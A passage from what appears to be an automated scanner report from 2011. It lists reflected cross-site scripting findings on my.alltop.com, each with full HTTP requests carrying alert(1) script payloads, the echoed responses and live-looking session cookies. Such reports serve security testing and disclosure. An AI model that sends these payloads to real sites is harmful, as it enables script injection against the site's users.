Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:23 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>de688<script>alert(1)</script>8612f734538" method="post" accept-charset="utf-8">
...[SNIP]...

1.208. http://my.alltop.com/alpha/t [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58df7"><script>alert(1)</script>67253344f17 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t58df7"><script>alert(1)</script>67253344f17 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:15 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:17 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:17 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t58df7"><script>alert(1)</script>67253344f17" method="post" accept-charset="utf-8">
...[SNIP]...

1.209. http://my.alltop.com/alpha/t [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ff91"><script>alert(1)</script>099360783ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t?9ff91"><script>alert(1)</script>099360783ca=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:12 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:12 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:12 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t?9ff91"><script>alert(1)</script>099360783ca=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.210. http://my.alltop.com/alpha/t [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4349"><script>alert(1)</script>aa4e0491774 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019A)%3C/script%3Eb4349"><script>alert(1)</script>aa4e0491774 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:31 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:32 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:32 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019A)%3C/script%3Eb4349"><script>alert(1)</script>aa4e0491774" method="post" accept-charset="utf-8">
...[SNIP]...

1.211. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f57c"><script>alert(1)</script>70956bbe484 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t'%22--%3E%3C3f57c"><script>alert(1)</script>70956bbe484/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:23 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:23 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:23 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t'%22--%3E%3C3f57c"><script>alert(1)</script>70956bbe484/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.212. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57a28"><script>alert(1)</script>a5935c4f1f1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t'%22--%3E%3C/style%3E%3C57a28"><script>alert(1)</script>a5935c4f1f1/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:23 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:24 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:24 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t'%22--%3E%3C/style%3E%3C57a28"><script>alert(1)</script>a5935c4f1f1/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.213. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ae31"><script>alert(1)</script>bae7195bc8d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C3ae31"><script>alert(1)</script>bae7195bc8d/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:24 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:24 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:24 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C3ae31"><script>alert(1)</script>bae7195bc8d/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.214. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa1b4"><script>alert(1)</script>3dc9074be73 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3Eaa1b4"><script>alert(1)</script>3dc9074be73 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:25 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:25 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:25 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3Eaa1b4"><script>alert(1)</script>3dc9074be73" method="post" accept-charset="utf-8">
...[SNIP]...

1.215. http://my.alltop.com/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46829"><script>alert(1)</script>dd25f4cd100 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E?46829"><script>alert(1)</script>dd25f4cd100=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:20 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:20 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:20 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E?46829"><script>alert(1)</script>dd25f4cd100=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.216. http://my.alltop.com/alpha/t/%22ns=%22netsparker(0x00021A) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t/%22ns=%22netsparker(0x00021A)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91c88"><script>alert(1)</script>f32a66e6908 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t91c88"><script>alert(1)</script>f32a66e6908/%22ns=%22netsparker(0x00021A) HTTP/1.1
Referer: http://my.alltop.com/
